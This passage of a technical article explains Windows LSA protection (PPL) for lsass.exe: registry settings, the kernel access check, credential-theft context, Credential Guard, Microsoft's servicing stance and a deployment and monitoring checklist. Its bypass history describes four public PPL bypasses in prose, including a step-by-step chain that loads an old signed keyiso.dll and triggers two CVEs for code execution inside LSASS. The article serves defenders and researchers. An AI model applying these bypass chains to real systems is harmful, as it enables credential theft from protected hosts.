Open the Registry Editor, or enter RegEdit.exe in the Run dialog, and then go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe registry key. Open the AuditLevel value. Set its data type to dword and its data value to 00000008.

Note: RunAsPPL sits under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. AuditLevel = 8 sits under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe. A defender who edits "the same key" silently sets the wrong value and audit mode never engages. The deployment looks correct from the registry; the log surface is empty; the rollout breaks production on enforcement day. Two values. Two hives. Read this twice.

In audit mode, the kernel emits the same 3065 / 3066 events for would-be load rejections but allows the loads to proceed. Two months of audit-mode telemetry typically surfaces every smart-card middleware DLL, every password-filter, every third-party CSP on a corporate fleet. Once the audit log is clean (every vendor's modules have been re-signed at the LSA level or replaced), enforcement mode can be turned on without breaking production logins.

Note: Skipping audit mode is the most common cause of LSA protection rollouts being rolled back after a wave of authentication failures. See §11 Item 1 for the full audit-then-enforce-then-UEFI-lock recipe.

The deployment cadence has been deliberately glacial. RunAsPPL shipped in Windows 8.1 in October 2013 -- opt-in. It remained opt-in for nine years. Microsoft Learn records the inflection [@learn-runasppl]:

Audit mode for added LSA protection is enabled by default on devices running Windows 11 version 22H2 and later.

Audit mode default-on. Not enforcement. The Windows 11 24H2 release expanded the audit-mode rollout further. Eleven years from opt-in to effective default. The pace reflects the compatibility risk: every domain with a single non-Microsoft-signed LSASS plug-in would have surfaced as a support call.

The registry knob is simple. The kernel check that enforces it is not. The next section walks the access-check pipeline in detail, because the structural reason SeDebugPrivilege cannot help an attacker is the order in which the kernel asks its questions.

7. The Kernel Access Check -- What Happens Inside `NtOpenProcess`

Recall the trace from Section 1. The denial happens before SeAccessCheck runs. The reason SeDebugPrivilege does not help is not that the kernel decided to override the privilege; it is that the kernel never asked about the privilege. The order matters. Let us walk it.

The Win32 caller invokes OpenProcess, which thunks through kernel32.dll to the syscall NtOpenProcess. NtOpenProcess does its handle-lookup and dispatches to the process-type object-manager open callback, PspProcessOpen. Ionescu's Part 2 names the path verbatim [@ionescu-part2]:

Access to protected processes (and their threads) is gated by the PspProcessOpen and PspThreadOpen object manager callback routines, which perform two checks. The first, done by calling PspCheckForInvalidAccessByProtection (which in turn calls RtlTestProtectedAccess and RtlValidProtectionLevel) ...

PspCheckForInvalidAccessByProtection does two things. First, it splits the caller's requested access mask into two subsets:

The limited mask -- a fixed set of bits (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, and a small handful of others) that the lattice never forbids. The limited mask is subject only to the standard SeAccessCheck against the target's DACL.
The full mask -- everything else, including PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, and PROCESS_ALL_ACCESS. The full mask is subject to the lattice rule.

The subset of `PROCESS_*` access rights that the PPL lattice always allows the standard `SeAccessCheck` to evaluate. Includes `SYNCHRONIZE`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SET_LIMITED_INFORMATION`, and `PROCESS_SUSPEND_RESUME`. `PROCESS_TERMINATE` is included for callers below the Antimalware tier (deny mask `0xFC7FE`), but the kernel widens the deny mask to `0xFC7FF` at the `Antimalware`, `Lsa`, and `WinTcb` rungs -- bit 0, `PROCESS_TERMINATE` -- making those three rungs unkillable except from peers or higher.

Second, it indexes into RtlProtectedAccess[] using the caller's signer rung and the target's type, retrieves the row of permissible access bits, and ANDs the row with the full mask. If the result is non-empty, the access proceeds; if the result is zero, the kernel strips the full-mask bits from the request and returns either the limited subset (if the caller asked for any limited bits) or STATUS_ACCESS_DENIED. RtlValidProtectionLevel runs alongside as a sanity check on the encoded byte to catch malformed EPROCESS.Protection values that would otherwise let the lattice walk off the end of the table.

sequenceDiagram participant App as Caller (any token) participant Nt as NtOpenProcess participant PsPO as PspProcessOpen participant Chk as PspCheckForInvalidAccessByProtection participant Rtl as RtlTestProtectedAccess + RtlValidProtectionLevel participant Tab as RtlProtectedAccess[] table participant SAC as SeAccessCheck App->>Nt: NtOpenProcess(DesiredAccess) Nt->>PsPO: dispatch PsPO->>Chk: protection check Chk->>Rtl: lookup caller / target rungs Rtl->>Tab: index row, retrieve allowed bits Tab-->>Rtl: row of allowed access bits Rtl-->>Chk: full mask allowed or stripped Chk-->>PsPO: residual mask (full or limited) PsPO->>SAC: residual mask vs DACL + token SAC-->>Nt: final mask Nt-->>App: handle or STATUS_ACCESS_DENIED

Key idea: The protection check runs before SeAccessCheck. Privileges are evaluated by SeAccessCheck. The reason SeDebugPrivilege does not help is structural -- it is not consulted at the moment of denial.

Four worked traces make this concrete.

Case (a): admin -> lsass with PROCESS_ALL_ACCESS. The caller has no EPROCESS.Protection.Type (it is None). The target is PPL/Lsa. The lattice forbids the full mask. The kernel strips every bit of PROCESS_ALL_ACCESS except the limited subset. The caller wanted to write memory; the limited subset cannot write memory; the operation effectively fails. This is the Mimikatz scenario.

Case (b): admin -> lsass with PROCESS_QUERY_LIMITED_INFORMATION. Same caller, same target, but the requested mask sits entirely in the limited subset. The lattice does not gate the limited mask. SeAccessCheck evaluates the DACL on lsass.exe, finds that administrators are permitted to query basic process information, and the call succeeds. This is why Process Explorer can still enumerate lsass.exe and show its threads even when LSA protection is enabled.

Case (c): MsMpEng.exe (PPL/Antimalware, rung 3) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 3 < target rung 4, so the full mask is denied. Defender cannot read LSASS memory. Defender does not need to; the cross-rung isolation prevents one Microsoft service from reading another Microsoft service's secrets even within the same trusted system.

Case (d): hypothetical PPL/WinTcb (rung 6) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 6 >= target rung 4, so the full mask is allowed. A process signed at the WinTcb rung can read LSASS memory by design. This is how Service Control Manager and Windows Error Reporting can still interact with protected lsass.exe.

Caller	Target	Mask	Lattice rule	Outcome
Admin, no Protection	PPL/Lsa	PROCESS_ALL_ACCESS	Caller has no rung	Full mask stripped (denied)
Admin, no Protection	PPL/Lsa	PROCESS_QUERY_LIMITED_INFORMATION	Limited mask	Allowed (DACL permitting)
PPL/Antimalware (3)	PPL/Lsa (4)	PROCESS_VM_READ	3 < 4	Denied
PPL/WinTcb (6)	PPL/Lsa (4)	PROCESS_VM_READ	6 >= 4	Allowed

The Audit bit revisits the table from a different angle. The bit is annotated Reserved in itm4n's public structure definition and named without semantic gloss in Ionescu Part 1; the precise runtime emission shape on an OpenProcess denial is not enumerated in any of Ionescu Part 1, Forshaw 2018, itm4n's RunAsPPL writeup, or Microsoft Learn's RunAsPPL page (whose CodeIntegrity events 3033/3063/3065/3066 are scoped to AuditLevel under IFEO\LSASS.exe and to DLL-load failures, not per-process Audit-bit denials) [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field name and bit position imply a forensic side-channel; the exact event shape is not in the public record.Two adjacent kernel mechanisms exist in the same neighbourhood but mediate different threat models. PROCESS_TRUST_LABEL_ACE (a Trust SID ACL entry, introduced in Windows 8.1 alongside PPL) is an ACL-side companion that runs inside SeAccessCheck -- it adds a token-style trust label that interacts with the security descriptor in the standard way. Code Integrity Guard (ProcessSignaturePolicy) is a per-process signed-image enforcer settable at CreateProcess time via the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute. Neither is part of PPL; both interact with the same problem space.

The kernel verifies who is asking, what they are asking for, and at what rung the target sits. What the kernel cannot verify is the behaviour of code that arrives through a signed channel and then executes against attacker-controlled data. That structural seam is the entire premise of the bypass arms race, and it is the next section.

8. The Bypass Arms Race -- Forshaw, itm4n, Landau

If the kernel only verifies the channel by which code enters a PPL, every bypass should attack the seam between channel and behaviour. Test that prediction against the public record. Since 2018, four named bypass acts have hit major Microsoft research blogs. All four sit in the same structural class.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every public PPL bypass since 2018 attacks the seam between what the channel proves (a signature, an EKU, a section identity) and what the code does once mapped.

Act I (2018) -- Forshaw and JScript-into-PPL

James Forshaw, then at Google Project Zero, published "Injecting Code into Windows Protected Processes Using COM" in October 2018 [@forshaw-2018-10]. The mechanism: a PPL can be made to instantiate a COM object whose CLSID resolves to scrobj.dll, the Microsoft-signed Windows Script Component scripting host. Once loaded into the PPL, the script object accepts attacker-supplied source code and executes it inside the protected process. The DLL is signed. The kernel admits it. The kernel cannot reason about the JScript source it then runs.

Microsoft's fix in Windows 10 1803 (April 2018, deployed broadly through that year) was a hardcoded deny-list in CI.DLL. Forshaw's own writeup gives the source verbatim [@forshaw-2018-10]:

UNICODE_STRING g_BlockedDllsForPPL[] = {
    DECLARE_USTR("scrobj.dll"),
    DECLARE_USTR("scrrun.dll"),
    DECLARE_USTR("jscript.dll"),
    DECLARE_USTR("jscript9.dll"),
    DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(
    PEPROCESS Process, LPBYTE Image, SIZE_T ImageSize)
{
    if (!PsIsProtectedProcess(Process)) return STATUS_SUCCESS;
    // walk g_BlockedDllsForPPL; if any match, return STATUS_DYNAMIC_CODE_BLOCKED
    ...
}

Five DLLs, hardcoded. Microsoft Learn corroborates the policy on the user-facing side [@learn-am-services]:

The following scripting DLLs are forbidden by CodeIntegrity inside a protected process: scrobj.dll, scrrun.dll, jscript.dll, jscript9.dll, and vbscript.dll.

Channel: a Microsoft-signed DLL. Behaviour: arbitrary attacker script. The fix narrows the channel by name-listing the five DLLs known to admit attacker behaviour. The class survives.The mechanism was previewed at Recon Montreal 2018 in the joint Forshaw-Ionescu talk "Unknown Known DLLs and other Code Integrity Trust Violations" (June 15-17, 2018) [@recon-mtl-2018]. Forshaw's August 2017 "Bypassing VirtualBox Process Hardening" essay [@forshaw-2017-vbox] is the structural precursor -- it makes the same channel-vs-behaviour argument against a different kernel-supported process-hardening regime.

Act II (2018-2021) -- DefineDosDevice and PPLdump

In his August 2018 post on object-directory exploits [@forshaw-2018-08], Forshaw added a single throwaway sentence that the security community would spend three years productising. itm4n quotes it verbatim in his 2021 SCRT walkthrough [@itm4n-scrt]:

Abusing the DefineDosDevice API actually has a second use, it's an Administrator to Protected Process Light (PPL) bypass.

The mechanism, fully worked out by itm4n in April 2021, is structural and uses that same primitive. As an administrator, call DefineDosDevice to create a symbolic link in \KnownDlls\ (the object-directory subkey that the loader uses for fast known-DLL lookups). The call is dispatched via RPC to csrss.exe, which runs at PPL/WinTcb (rung 6) and so has the lattice authority to write into protected directories. The administrator gets a \KnownDlls\ entry pointing at an attacker-controlled section. Now start a PPL. The PPL's loader resolves DLL names through \KnownDlls\ and finds the administrator's entry. The PPL maps the attacker's section without re-validating its on-disk signature, because \KnownDlls\ is the kernel's vouched-for fast path.

itm4n's PPLdump tool, published April 2021, automated the attack. The README test matrix lists every Windows version it ran against [@ppldump-repo]. For fifteen months, an administrator could dump any PPL's memory, including lsass.exe, despite RunAsPPL.

Microsoft's fix arrived in build 19044.1826 (the July 2022 update to Windows 10 21H2). itm4n's "End of PPLdump" writeup describes the patch and the BinDiff diff verbatim [@itm4n-end-of-ppldump]:

The conclusion is that PPLs now appear to be behaving just like PPs and therefore no longer rely on Known DLLs.

The fix patched LdrpInitializeProcess in NTDLL to skip \KnownDlls\ for PPL processes, behind a Velocity feature flag (Feature_Servicing_2206c_38427506__private_IsEnabled). PPLdump's repository README now opens with [@ppldump-repo]:

2022-07-24 - As of Windows 10 21H2 10.0.19044.1826 (July 2022 update), the exploit implemented in PPLdump no longer works. A patch in NTDLL now prevents PPLs from loading Known DLLs.

itm4n's structural finding -- that *PPLs honoured \KnownDlls\ while PPs did not* -- is the most interesting failure in the eight-year run, because the asymmetry sat in plain sight from 2013 to 2022 and nobody had asked "why are PPs and PPLs loading sections differently?" The fix closes one asymmetry. The structural class survives.PPLdump's substitution chain uses NTFS transactions and Forrest Orr's "phantom DLL hollowing" technique to materialise the attacker-controlled section on disk in a way the kernel section creator will accept [@forrest-orr-hollow]. Orr's writeup is the original publication of the hollowing primitive; PPLdump composes it with the \KnownDlls\ redirection trick.

Act III (2022-2024) -- Landau's PPLFault CI TOCTOU

Gabriel Landau, then at Elastic, presented "PPLdump Is Dead. Long Live PPLdump!" at Black Hat Asia 2023 [@bh-asia-2023-pdf]. The mechanism is a Time-Of-Check / Time-Of-Use bug at the section-creation layer.

A class of bug in which a security property is verified at one point in time but the underlying object is mutable between the check and the use. The protected resource passes its check, then changes between check and access, and the operation proceeds against the changed state without re-verification.

The TOCTOU here is subtle. When a PPL calls NtCreateSection on a Microsoft-signed DLL, the kernel's memory manager calls MiValidateSectionCreate, which calls into ci.dll to verify the file's Authenticode signature. The check succeeds. The section is created. But the memory manager does not page in the file contents at section-create time; it pages them in lazily, on demand, when threads first touch the mapped pages. If an attacker can keep the section's backing file unsubstituted during the signature check and substituted during the lazy page-in, the kernel will execute attacker bytes through a section whose signature it already verified.

Landau's exploit uses Windows' CloudFilter API. An attacker holds an exclusive oplock on a Microsoft-signed DLL during the section-create signature check. After the check passes, the attacker's CloudFilter FetchDataCallback provides different bytes (the payload) when the kernel pages in the section. The PPL maps and executes the payload. Landau's Elastic post documents the chain verbatim [@elastic-pplfault]:

The internal memory manager function MiValidateSectionCreate relies on the Code Integrity module ci.dll to handle the requisite cryptography and PKI policy.

Microsoft's fix shipped in Windows Insider Canary build 25941 on September 1, 2023 [@elastic-pplfault]:

On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941 ... Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.

The fix narrows the immediate channel by extending page-hash validation to PPL-loaded images that reside on remote (SMB redirector) paths -- the precise surface that PPLFault required to drive its CloudFilter FetchDataCallback substitution [@elastic-pplfault]. Locally-cached PPL DLL loads continue to rely on the section-create signature check, so the structural seam survives. The GA patch shipped on February 13, 2024 [@pplfault-repo]:

2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.

Channel: a signed Microsoft DLL whose hash matched at section create. Behaviour: attacker payload mapped via the lazy page-in. The fix narrows the channel by widening the verification surface from "the file at section-create time" to "every page at fault time." The class survives.

Act IV (2022-2024) -- BYOVDLL and itm4n's KeyIso chain

Bring Your Own Vulnerable DLL. Coined by Gabriel Landau on Twitter in October 2022 (itm4n screenshots the original tweet [@itm4n-ghost-part1]; tweet status 1580067594568364032). Productised by itm4n in August 2024 in "Ghost in the PPL Part 1."

A bypass class against any signature-gated security mechanism in which the attacker loads a *legitimately signed but historically vulnerable* binary and exploits the known vulnerability inside it. The signature check passes; the vulnerability does the work. The structural property that makes the class hard to fix is that the kernel cannot deny-list legitimately signed older Microsoft DLLs without breaking the deployments that still depend on them.

itm4n's specific chain targets the CNG Key Isolation service ("KeyIso"), which runs in lsass.exe and so inherits its PPL/Lsa protection. The chain is precise [@itm4n-ghost-part1]:

As administrator, stop the KeyIso service.
Set HKLM\SYSTEM\CurrentControlSet\Services\KeyIso\Parameters\ServiceDll to point at an older keyiso.dll extracted from Microsoft update KB5023778. This DLL is Microsoft-signed; the kernel admits it.
Restart the KeyIso service. The older keyiso.dll loads into LSASS at PPL/Lsa.
Trigger CVE-2023-36906, an out-of-bounds read information disclosure in the older keyiso.dll, to leak an address.
Trigger CVE-2023-28229, one of six use-after-frees in the same DLL, to obtain control of a CALL target via the RAX register.
Execute attacker code at PPL/Lsa.

The CVEs are real and tracked. k0shl's writeup is the primary root-cause analysis [@k0shl-keyiso]:

Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure.

NVD records both [@nvd-2023-28229] [@nvd-2023-36906]. Y3A's GitHub repository [@y3a-cve-poc] provides a public PoC for CVE-2023-28229 that itm4n's chain composes.

Channel: an actually-Microsoft-signed DLL. Behaviour: the memory-safety vulnerability inside it. There is no general fix announced. Microsoft fixed the specific CVEs by shipping a newer keyiso.dll, but the older DLL remains in circulation (it ships inside every patched cumulative update bundle), and a kernel that has to admit every legitimately signed older Microsoft DLL has no general defense against the next CVE-of-the-month.

Note: BYOVDLL has no general patch. Microsoft fixes each underlying CVE on the standard cumulative-update cadence. The class persists for as long as the kernel admits older signed Microsoft DLLs into PPLs, which is for as long as legitimately deployed software depends on the older DLLs.

timeline title PPL Bypass Arms Race (2018-2024) 2018-10 : Forshaw JScript-into-PPL : Fix 1803 Apr 2018 : g_BlockedDllsForPPL deny-list 2021-04 : itm4n PPLdump (KnownDlls) : Fix Jul 2022 build 19044.1826 : LdrpInitializeProcess patch 2022-09 : Landau PPLFault (TOCTOU) : Fix Feb 2024 13 GA : CI page-hash for PPLs 2024-08 : itm4n BYOVDLL KeyIso chain : No general fix : CVEs patched piecewise

Act	Year	Channel verified	Behaviour exploited	Microsoft fix	Fix date
I	2018	Microsoft-signed `scrobj.dll`	JScript source executed by COM object	`g_BlockedDllsForPPL` deny-list of 5 DLLs	Apr 2018 (1803)
II	2021	`\KnownDlls\` symlink (CSRSS-blessed)	Attacker section mapped without re-validation	NTDLL `LdrpInitializeProcess` patch	Jul 2022 (19044.1826)
III	2023	Signed DLL passed `MiValidateSectionCreate`	CloudFilter substitutes bytes on lazy page-in	`/INTEGRITYCHECK` page hashes for PPLs	Feb 2024 (GA)
IV	2024	Legitimately-signed older `keyiso.dll`	Use-after-free + OOB read (CVE-2023-28229, CVE-2023-36906)	None (CVE-by-CVE)	open

flowchart TD A[Admin stops KeyIso service] B[Repoint ServiceDll to older keyiso.dll
from KB5023778] C[Restart KeyIso service] D[Older keyiso.dll loads
into lsass.exe PPL/Lsa] E[Trigger CVE-2023-36906
OOB read for info leak] F[Trigger CVE-2023-28229
UAF for RAX control] G[Code execution at PPL/Lsa] A --> B --> C --> D --> E --> F --> G itm4n explicitly attributes the BYOVDLL framing to Landau's October 2022 tweet, even though itm4n's KeyIso chain is the first public productisation. The attribution chain matters because it documents how a one-line research observation (Twitter status 1580067594568364032, screenshot preserved in [@itm4n-ghost-part1]) became a working exploit two years later. The pattern repeats in this domain: Forshaw's one-sentence DefineDosDevice comment to PPLdump (3 years); Landau's BYOVDLL tweet to itm4n's KeyIso chain (2 years). The structural class outlives its discoverer.

Four acts, one class. Every public bypass since 2018 has lived in the same narrow shape: code that becomes part of a PPL through a signed channel and executes attacker-influenced data once mapped. Each generation of fix narrows what the channel admits -- name-list five DLLs; ignore \KnownDlls\; page-hash every section; CVE-patch every vulnerable older DLL. The class survives because the kernel cannot reason about behaviour. By Rice's theorem it cannot reason about behaviour in general; in practice, it has nowhere even to start.

If lsass.exe code execution is reachable through BYOVDLL, where are the actual secrets? Not in lsass.exe. Not anywhere the kernel can read at all. The next section is the companion boundary.

9. The Companion Boundary -- Credential Guard, VBS, and `LsaIso.exe`

itm4n opens his RunAsPPL walkthrough with a warning [@itm4n-runasppl]:

I noticed that this protection tends to be confused with Credential Guard, which is completely different.

The confusion is understandable. Both run on Windows. Both protect LSASS. Both are configured by domain administrators. Both yield "ACCESS_DENIED" to Mimikatz when working correctly. They are nonetheless answering different questions, and they stack rather than replace each other.

PPL stops an administrator from reading kernel-trusted user-mode memory. It does nothing against a kernel-mode attacker who can simply zero the Protection byte in the target EPROCESS. The kernel-mode attacker is the next threat-model rung up, and the kernel-mode attacker is the threat that Credential Guard answers, by moving the credentials themselves out of lsass.exe entirely.

A Hyper-V-based isolation regime in which the Windows hypervisor partitions the system into Virtual Trust Levels (VTLs). VTL0 contains the normal Windows kernel and user-mode processes. VTL1 contains the Secure Kernel and a small set of user-mode trustlets. Memory in VTL1 is inaccessible to VTL0, even from VTL0 kernel-mode code. A user-mode process running inside VTL1. Trustlets are Microsoft-signed at a specific protected-process equivalent rung within VTL1 and serve as the user-mode hosts for VBS-isolated functionality. `LsaIso.exe` is the trustlet that holds the actual credential material on Credential Guard-enabled hosts.

The architecture is, at the highest level, three layers: VTL0 user-mode, VTL0 kernel, and VTL1 (Secure Kernel plus trustlets). On a Credential Guard-enabled host, lsass.exe still exists in VTL0 user-mode, still protects itself with PPL/Lsa, and still answers authentication requests. But it no longer holds the NTLM hashes, Kerberos TGT keys, or Cred Manager domain credentials. Those secrets live in LsaIso.exe, a trustlet in VTL1. When LSASS needs to authenticate a credential, it makes a hypercall into VTL1, and LsaIso.exe performs the cryptographic operation entirely within VTL1 memory, returning only the result. The keys never leave VTL1.

Microsoft's documentation states the threat model directly [@learn-cg]:

Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.

Credential Guard uses Virtualization-based security (VBS) to isolate secrets so that only privileged system software can access them.

Malware running in the operating system with administrative privileges can't extract secrets that are protected by VBS.

The third sentence is the load-bearing one. Malware running with administrative privileges maps cleanly to a PPL bypass that achieves code execution at PPL/Lsa. Even from inside lsass.exe, the secrets are not there.

flowchart TD subgraph VTL0[VTL0 normal world] Admin[Admin / SYSTEM token] Lsass[lsass.exe at PPL/Lsa] Kern0[VTL0 kernel] end subgraph VTL1[VTL1 secure world] SK[Secure Kernel] Iso[LsaIso.exe trustlet] Secrets[NTLM hashes, Kerberos TGT keys] end Admin -- "PPL barrier (lattice)" --x Lsass Lsass -- hypercall --> Iso Kern0 -- "VBS barrier (VTL boundary)" --x Iso Iso --> Secrets

The two mechanisms stack rather than overlap. PPL prevents an admin from OpenProcess(PROCESS_VM_READ, lsass) at the user-mode lattice level. Credential Guard prevents a kernel-mode attacker who succeeds against PPL from finding the keys, because the keys are in VTL1 memory that the VTL0 kernel cannot read at all. itm4n's "complementary" framing in the RunAsPPL writeup is the right operational summary [@itm4n-runasppl]: deploy both, always both.

Note: PPL gates user-mode admins out of LSASS code memory. Credential Guard gates everything else (kernel-mode attackers, BYOVDLL execution-at-PPL/Lsa) out of the secrets themselves by moving the secrets to VTL1. Each mechanism answers a layer of the threat model the other does not.

Dimension	PPL (LSA protection)	Credential Guard
Threat model	Administrator -> user-mode LSASS	VTL0 kernel + admin -> credential material
Layer	VTL0 user-mode lattice	VTL0 / VTL1 VBS boundary
Kernel-mode attacker	Cannot stop them	Stops them (VBS-isolated memory)
MSRC classification	Defense in depth	Security boundary
Default-on (consumer)	Audit mode, Win11 22H2	n/a (enterprise)
Default-on (enterprise)	Audit mode, Win11 22H2	Enabled, Win11 22H2 / Win Server 2025 (domain-joined non-DC)

The architecture of `LsaIso.exe`, its trustlet ID, its IUM EKU, and the hypercall plumbing between LSASS and the trustlet are the subject of a separate article in this series ("VBS Trustlets: What Actually Runs in the Secure Kernel"). The cross-link is deliberate: PPL and Credential Guard are paired in practice, but the architectural depth of VTL1 is its own subject.

Credential Guard's default-on rollout, recorded in Microsoft Learn [@learn-cg]:

Starting in Windows 11, 22H2 and Windows Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements.

Two stacked mechanisms; one classified as a security boundary, one not. The next section asks what the classification means.

10. Where PPL Isn't a Security Boundary -- Microsoft's Servicing Criteria

Gabriel Landau's "Inside Microsoft's Plan to Kill PPLFault" essay states the classification in one sentence [@elastic-pplfault]:

Microsoft does not consider PPL to be a security boundary, meaning they won't prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.

Microsoft's "Windows Security Servicing Criteria" defines the term security boundary directly [@msrc-servicing]:

A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic [...] security boundary.

A logical separation between code and data of security domains with different levels of trust. Microsoft commits to servicing security boundary violations with out-of-band patches when the severity bar is met. The kernel-mode / user-mode separation is the canonical example. Per Microsoft's published servicing criteria, PPL is *not* on the security-boundary list. A security feature that raises the cost of an attack without guaranteeing prevention. Microsoft treats defense-in-depth features as servicing targets on the standard cumulative-update cadence, not as out-of-band patch priorities. PPL falls into this category per Microsoft's published classification.

The relevant excerpts of the criteria page enumerate which surfaces are and are not boundaries. The live MSRC page renders that enumeration table client-side via JavaScript; the raw HTML returned by automated fetchers contains only the React shell. The text of the enumeration is preserved in the Wayback Machine capture at archive date 2023-05-06 [@msrc-criteria-archive], and Landau's follow-on Elastic post quotes the relevant administrative-process row verbatim [@elastic-byovd-admin]:

Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong[ly] isolated from the kernel boundary.

The corresponding row for PPL is the same shape: administrative-process-to-PPL is not isolated as a security boundary. Landau filed VULN-074311 with MSRC in September 2022 disclosing both an admin-to-PPL and a PPL-to-kernel zero-day. The Elastic post records MSRC's classification of the disclosure verbatim [@elastic-byovd-admin]:

MSRC similarly does not consider admin-to-PPL a security boundary, instead classifying it as a defense-in-depth security feature.

The MSRC servicing-criteria page's *definition* of "security boundary" is retrievable from raw HTML and verified against the live page. The *enumeration* of which Windows surfaces are or are not boundaries lives in a client-side rendered table and is not present in the raw HTML payload. The verifiable trail for "PPL is excluded from the boundary list" is the Wayback Machine capture combined with Elastic's verbatim quotation of MSRC's classification.

The operational consequence is direct. A published PPL bypass does not trigger an out-of-band patch. It is fixed on the next major-release cadence, sometimes faster if Microsoft has internal motivation. The disclosure-to-fix half-lives are public record:

Bypass	Disclosed	Microsoft fix	Disclosure-to-fix
Forshaw 2018 JScript-into-PPL	Oct 2018	Apr 2018 (1803, pre-disclosure)	~0 months (Microsoft fixed first)
itm4n 2021 PPLdump (KnownDlls)	Apr 2021	Jul 2022 (build 19044.1826)	~15 months
Landau 2023 PPLFault (CI TOCTOU)	Apr-Sep 2023	Feb 2024 (GA)	~5-11 months
itm4n 2024 BYOVDLL (KeyIso chain)	Aug 2024	none (open, CVE-by-CVE)	open

Note: A correctly classified PPL bypass is fixed on the standard cumulative-update cadence, not out-of-band. The implication for defenders is operational: PPL is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Treat detection (Section 11) and the Credential Guard companion (Section 9) as load-bearing.

The reader takeaway is the third Aha moment of the article. PPL is real, kernel-enforced, structurally elegant, and demonstrably effective against the threat it was designed for (administrator-from-user-mode reads of LSASS). It is also explicitly not a security boundary per Microsoft's own published servicing policy, and that classification is the most important fact about it. Plan for bypasses. Stack with Credential Guard. Treat detection as primary, not secondary.

11. Practical Guide -- Configuring, Verifying, and Monitoring PPL

If you are deploying PPL on a corporate fleet, run this checklist. The order is deliberate: audit before enforce, verify before trust the verifier, and detect because no static control survives unmotivated.

Deploy

Note: Enable AuditLevel = 8 under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe for two months [@learn-runasppl]. This is a different registry hive from RunAsPPL (which lives under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); mixing the two values up is the most common Stage 0 deployment error (see §6). Collect CodeIntegrity events 3065 and 3066 to enumerate every LSASS plug-in that would fail enforcement (smart-card middleware, third-party CSPs, password-filter DLLs). Re-sign or replace the failing modules. Set RunAsPPL = 1 on Secure Boot-capable machines; the kernel automatically stores the policy in a UEFI variable. RunAsPPL = 2 (Win11 22H2+) is the softer option that omits the UEFI variable for environments requiring admin-removable protection.

Note: For third-party EDR, confirm the agent daemon runs at PPL/Antimalware (signer rung 3, byte 0x31). Process Explorer exposes this via View -> Select Columns -> Protection. System Informer (the modern Process Hacker fork that itm4n recommends in his BYOVDLL writeup [@itm4n-ghost-part1]) shows the same field in its process list. If your EDR is not running at PPL/Antimalware, it does not have the kernel's protection against admin tampering even when its vendor claims "protected" in marketing material. Process Explorer's "Protection" column ships in the canonical Sysinternals distribution [@sysinternals-procexp]; it reads EPROCESS.Protection via the NtQueryInformationProcess entry point [@learn-ntqueryinfoproc], although the specific ProcessProtectionInformation information-class value is not enumerated in the public Learn PROCESSINFOCLASS table -- the value is community-documented from Windows headers and reverse engineering rather than from a Microsoft Learn API reference.

Verify

Note: On a host you suspect of misconfiguration, attach WinDbg to the kernel and run !process 0 7 lsass.exe. The output includes the _PS_PROTECTION byte. Decode it with the formula from §3 above: ((value & 0xF0) >> 4) is the signer rung; value & 0x07 is the type; (value >> 3) & 1 is the audit bit. A RunAsPPL = 1 host yields 0x41 (PPL + Lsa). The Defender service yields 0x31 (PPL + Antimalware). csrss.exe yields 0x61 (PPL + WinTcb). If lsass.exe shows 0x00, the registry policy did not take effect on this boot.

{function decode(b) { const t = b & 0x07, a = (b >> 3) & 0x01, s = (b >> 4) & 0x0F; const tn = ['None', 'ProtectedLight', 'Protected']; const sn = ['None','Authenticode','CodeGen','Antimalware', 'Lsa','Windows','WinTcb','Max']; return '0x' + b.toString(16).padStart(2,'0') + ' = ' + (sn[s] || s) + '-' + (tn[t] || t) + (a ? ' (Audit on)' : ''); } // Three benchmark values you should be able to recognise by sight console.log(decode(0x31)); // MsMpEng.exe (Defender at PPL/Antimalware) console.log(decode(0x41)); // lsass.exe under RunAsPPL=1 console.log(decode(0x61)); // csrss.exe (PPL/WinTcb)}

Monitor

Note: The CodeIntegrity provider emits three event IDs that matter for PPL monitoring [@learn-runasppl]: | Event ID | Provider | What it tells you | |---|---|---| | 3033 | Microsoft-Windows-CodeIntegrity | A DLL load was blocked by CI (PPL or otherwise) | | 3063 | Microsoft-Windows-CodeIntegrity | Enforcement-mode: LSASS plug-in failed the shared-section security requirement (complement of audit-mode event 3065) | | 3065 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the shared-section requirement | | 3066 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the Microsoft signing level requirement | Sysmon Event 10 (ProcessAccess) captures OpenProcess denials with the requested access mask and is the cheapest detection for a Mimikatz-shaped attempt against an RunAsPPL-protected lsass.exe. A burst of 3033 events from a non-Microsoft process targeting lsass.exe is the canonical signal that a PPL bypass attempt is under way.

